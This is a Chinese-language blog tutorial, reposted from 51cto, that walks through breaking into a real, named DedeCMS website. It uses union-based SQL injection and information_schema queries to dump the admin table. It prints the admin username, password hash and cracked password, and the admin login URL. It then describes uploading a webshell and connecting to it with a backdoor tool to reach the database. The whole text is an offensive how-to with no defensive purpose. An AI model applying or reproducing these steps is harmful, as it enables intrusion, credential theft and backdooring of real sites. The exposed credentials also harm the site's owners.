注入点:http://www.51team.cn/newmess.php?id=138
找到注入点后猜字段,可用 order by 1 猜解,order by不可用时,可用union 联合查询!
我这里猜解到的字段是22, 上图:
接下来爆显示位!语法: and 1=2 union select1,2,4,5,...,22 字段多少就输入多少,中间太常,省略了!
然后回车打开,页面出现了一个9的数字!如图:
然后我们来查询下是什么版本,用户名,数据库!
version() 版本database()当前数据库 user() 用户,要查询什么就把刚才爆出9的显示位替换掉,如图:
这是版本号,如果要查询用户名就把浏览器上面的9替换成 user()就行了!
这是我查出来
版本号:5.1.32-community
数据库:51teamcom
用户名:51teamcom 数据库和用户名一样!
接下来我们来报表了, 语法 :FROM information_schema.TABLESwhere table_schema=database() limit 0,1 把浏览器里
的9改成 table_name ,然后回车,你就会看到表了,第一个表是:dede_addonarticle 我们只要爆出的管理员的表就行了!
我们继续爆,每爆一个就得修改下这个语法 limit 0,1 爆第2个的时候把0改成1,比如:limit 1,1 爆第3个的时候继续+1 如:limit 2,1 php中0是第一位!
这是我爆出来的表:
dede_addonproduct,dede_admin,dede_admintype,dede_arcatt,dede_arccache,dede_archives,dede_arcrank,dede_arctiny,ddede_arctype,dede_channeltype,dede_co_htmls,dede_co_mediaurls,dede_co_note,dede_co_urls,dede_diyforms,dede_feedback,dede_flink,dede_flinktype,dede_freelist,dede_guestbook,dede_homepageset
织梦的程序!
其中dede_admin 应该就是管理员的表了!我们爆下看!
爆之前,我们先把dede_admin 转换成16进制的,就是这个 646564655F61646D696E
语法:information_schema.columns WHEREtable_name=0x646564655F61646D696E limit0,1 还是跟上面一样,爆第几个就修改数字 0 ,把我们刚才转换的16进制放到0x后面,0x不要动,然后把显示位9的数字改成 column_name 然后就行!
我爆的段:id,userid,pwd,uname,tname,email pwd应该就是密码,uname应该是账号,我们试试!
and 1=2 union select 1,2,3,4,5,6...,22 from dede_admin 把浏览器里面的语法全部去掉,剩***入点就行,就是这样;
http://www.51team.cn/about.php?id=10 and 1=2 unionselect 1,2,3,4,5,6...,22 from dede_admin 然后回车!
然后把9替换成刚才我爆出来的字段 我替换了uname和pwd,开了2个浏览器!
用户是:admin密码是:d9d2b2de067864194059 密码加密的,可到cmd5.com解密 如图:
密码解出来了,这个 bx2013 ,接下来找后台,可以用软件扫或者谷歌找!我找出来了:
http://www.51team.cn/web_admin/login.php
成功登陆:
随便找个上传点就行,然后上传马,先挂个txt吧,嘿嘿!http://www.51team.cn/a.txt
接下来,***咯!
***可以上传***马,也可以用菜刀,我就用菜刀的吧,方便!随便找个php文件添加一句话!
好,连接了
如果你是用网马脱的话,就得看网站配置文件conn.php 里面的数据库用户名和密码!
连接后,点网站列表,然后在网址那里右键点击数据库管理,然后打开一个窗口,那个窗口就是数据库了!如图:
转载于:https://blog.51cto.com/a3147972/1548253